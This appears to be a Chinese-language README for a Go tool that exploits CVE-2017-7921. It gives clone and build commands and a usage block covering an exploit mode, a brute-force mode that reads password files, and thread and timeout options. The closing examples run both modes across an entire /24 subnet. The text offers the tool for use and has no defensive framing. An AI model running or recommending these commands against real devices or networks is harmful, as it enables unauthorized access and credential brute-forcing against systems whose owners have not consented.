git clone https://github.com/MisakaMikato/cve-2017-7921-golang.git
cd cve-2017-7921-golang/src/cve-2017-7921-golang
go build .
cve-2017-7921 [-e] [-b] [--password password] [-t target] [--thread thread] [-timeout time]
选项:
-b 使用暴力破解模式
-e 使用 CVE-2017-7921 漏洞利用模式
-o string
设置输出路径,如果为空,结果将输出到标准输出。
-password string
如果使用暴力破解模式,设置密码或密码文件路径,语法为 'file:<path>'(默认 "12345")
-t string
漏洞利用目标,ip:port 或文件路径,例如:127.0.0.1,或目标文件路径,语法为 'file:<path>'
-thread int
并发线程数(默认 1)
-timeout int
超过此时间将放弃目标(默认 5)
按 'w' 获取进度信息 :)
示例
cve-2017-7921 -e -t 192.168.1.0/24 --thread 10 -o ./res.txt
cve-2017-7921 -b --password file:./pwds.txt -t 192.168.1.0/24 --thread 10